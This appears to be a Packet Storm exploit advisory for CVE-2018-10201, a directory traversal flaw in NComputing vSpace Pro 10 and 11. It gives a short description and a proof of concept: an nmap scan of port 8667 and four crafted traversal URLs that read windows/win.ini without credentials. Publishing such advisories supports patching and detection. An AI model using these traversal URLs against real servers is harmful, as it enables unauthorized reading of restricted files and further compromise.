Ncomputing vSPace Pro 10 / 11 Directory Traversal

2018-04-23T00:00:00
ID PACKETSTORM:147303
Type packetstorm
Reporter Javier Bernardo
Modified 2018-04-23T00:00:00

Description

                                        
                                            `# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability  
# Date: 2018-04-20  
# Software Vendor: NComputing  
# Software Link:   
# Author: Javier Bernardo  
# CVE: CVE-2018-10201  
# Category: Webapps  
  
#[Description]  
#  
#It is possible to read arbitrary files outside the root directory of  
#the web server. This vulnerability could be exploited remotely by a  
#crafted URL without credentials, with a|/ or a|\ or a|./ or a|.\ as a  
#directory-traversal pattern to TCP port 8667.  
#  
#An attacker can make use of this vulnerability to step out of the root  
#directory and access other parts of the file system. This might give  
#the attacker the ability to view restricted files, which could provide  
#the attacker with more information required to further compromise the system.  
  
#[PoC]  
  
nmap -p T:8667 -Pn your_vSpace_server  
  
Nmap scan report for your_vSpace_server (x.x.x.x)  
Host is up (0.044s latency).  
  
PORT STATE SERVICE  
8667/tcp open unknown  
  
http://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini  
  
http://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini  
  
http://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini  
  
http://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini  
  
  
`